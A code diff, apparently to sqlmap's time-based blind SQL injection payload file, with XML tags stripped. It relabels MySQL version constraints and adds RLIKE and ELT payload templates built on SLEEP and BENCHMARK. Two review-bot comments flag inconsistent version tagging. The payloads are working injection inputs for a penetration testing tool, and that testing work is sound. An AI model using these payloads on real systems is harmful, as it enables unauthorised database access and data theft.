diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 95a6f5160..e8993f92b 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -1,9 +1,9 @@
-
+
- MySQL > 5.0.11 AND time-based blind (SELECT)
+ MySQL >= 5.0.12 AND time-based blind (SELECT)
 5
 1
 1
@@ -18,12 +18,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (SELECT) + MySQL >= 5.0.12 OR time-based blind (SELECT) 5 1 3 @@ -38,12 +38,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind (SELECT - comment) + MySQL >= 5.0.12 AND time-based blind (SELECT - comment) 5 3 1 @@ -59,12 +59,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (SELECT - comment) + MySQL >= 5.0.12 OR time-based blind (SELECT - comment) 5 3 3 @@ -80,12 +80,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind + MySQL >= 5.0.12 AND time-based blind 5 2 1 @@ -100,12 +100,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind + MySQL >= 5.0.12 OR time-based blind 5 2 3 @@ -120,12 +120,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind (comment) + MySQL >= 5.0.12 AND time-based blind (comment) 5 4 1 @@ -141,12 +141,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (comment) + MySQL >= 5.0.12 OR time-based blind (comment) 5 4 3 @@ -162,12 +162,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL < 5.0.12 AND time-based blind (heavy query) + MySQL <= 5.0.11 AND time-based blind (heavy query) 5 2 2 @@ -182,11 +182,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 OR time-based blind (heavy query) + MySQL <= 5.0.11 OR time-based blind (heavy query) 5 2 3 @@ -201,11 +202,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 AND time-based blind (heavy query - comment) + MySQL <= 5.0.11 AND time-based blind (heavy query - comment) 5 5 2 @@ -221,11 +223,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 OR time-based blind (heavy query - comment) + MySQL <= 5.0.11 OR time-based blind (heavy query - comment) 5 5 3 @@ -239,6 +242,168 @@ +
+ MySQL + <= 5.0.11 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (SELECT) + 5 + 2 + 1 + 1,2,3 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comment) + 5 + 4 + 1 + 1,2,3 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind + 5 + 5 + 1 + 1,2,3 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL AND time-based blind (ELT) + 5 + 3 + 1 + 1,2,3 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL OR time-based blind (ELT) + 5 + 3 + 3 + 1,2,3 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL AND time-based blind (ELT - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + MySQL OR time-based blind (ELT - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + +
MySQL
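Review bot: The four new ELT entries at the end of the @@ -239,6 +242,168 @@ hunk are version-tagged inconsistently — only the first (`MySQL AND time-based blind (ELT)`) carries a `>= 5.0.12` line under its `MySQL` dbms entry, while the OR, AND-comment and OR-comment variants have no version line at all, even though all four depend on `SLEEP()`, the very function this commit pins to `>= 5.0.12` everywhere else in the file. Assuming the bare `>= 5.0.12` line is the dbms_version element (tags are stripped in this view), the engine would have no way to skip the three untagged ELT entries on older servers, unlike every other SLEEP()-based entry. Adding the same `>= 5.0.12` version line to the other three entries, and stating it in their titles as the adjacent RLIKE entries do (`MySQL >= 5.0.12 AND time-based blind (ELT)`), would keep the group consistent with the rest of the file.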
@@ -850,7 +1015,7 @@
- Firebird AND time-based blind (heavy query) + Firebird >= 2.0 AND time-based blind (heavy query) 5 4 2 @@ -870,7 +1035,7 @@ - Firebird OR time-based blind (heavy query) + Firebird >= 2.0 OR time-based blind (heavy query) 5 4 3 @@ -890,7 +1055,7 @@ - Firebird AND time-based blind (heavy query - comment) + Firebird >= 2.0 AND time-based blind (heavy query - comment) 5 5 2 @@ -911,7 +1076,7 @@ - Firebird OR time-based blind (heavy query - comment) + Firebird >= 2.0 OR time-based blind (heavy query - comment) 5 5 3 @@ -1173,12 +1338,12 @@ - + - + - MySQL >= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) + MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) 5 3 2 @@ -1193,42 +1358,20 @@
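Review bot: The four Firebird heavy-query titles (hunks @@ -850, @@ -870, @@ -890 and @@ -911) now promise `>= 2.0`, but each hunk is seven lines and changes only the title, so no matching version element is visible in this diff. The only Firebird-looking version line that does appear, the `> 2.0` context at the start of the @@ -1593,12 +1759,11 @@ hunk, uses the strict form; if the heavy-query entries' own details blocks (outside these hunks) still read `> 2.0` or carry no version at all, title and enforced constraint disagree in the same way the MySQL `> 5.0.11` entries did before this commit. Worth either adding `>= 2.0` to those details blocks in the same change or keeping the titles' form identical to the element the engine actually checks.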
MySQL - > 5.0.11 -
-
- - - - - MySQL > 5.0.11 time-based blind - Parameter replace (SELECT) - 5 - 4 - 1 - 1,2,3 - 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 time-based blind - Parameter replace (SELECT - comment) + MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE) 5 5 - 1 - 1,2,3 - 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) # @@ -1236,14 +1379,16 @@
MySQL - > 5.0.11 + >= 5.0.12
+ + - MySQL >= 5.0 time-based blind - Parameter replace + MySQL >= 5.0.12 time-based blind - Parameter replace 5 - 3 + 2 1 1,2,3 3 @@ -1256,12 +1401,32 @@
MySQL - >= 5.0 + >= 5.0.12
- MySQL < 5.0 time-based blind - Parameter replace (heavy queries) + MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT) + 5 + 3 + 1 + 1,2,3 + 3 + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries) 5 4 2 @@ -1276,6 +1441,7 @@
MySQL + <= 5.0.11
@@ -1299,15 +1465,15 @@ - MySQL time-based blind - Parameter replace (MAKE_SET) + MySQL time-based blind - Parameter replace (ELT) 5 5 1 1,2,3 3 - MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) + ELT([INFERENCE],SLEEP([SLEEPTIME])) - MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) @@ -1318,15 +1484,15 @@ - MySQL time-based blind - Parameter replace (ELT) + MySQL time-based blind - Parameter replace (MAKE_SET) 5 5 1 1,2,3 3 - ELT([INFERENCE],SLEEP([SLEEPTIME])) + MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) - ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) @@ -1593,12 +1759,11 @@ > 2.0 - + - - + - MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause + MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause 5 3 1 @@ -1613,12 +1778,12 @@
MySQL - >= 5.0.11 + >= 5.0.12
- MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query) + MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query) 5 4 2 @@ -1633,6 +1798,7 @@
MySQL + <= 5.0.11
@@ -1815,5 +1981,5 @@ - +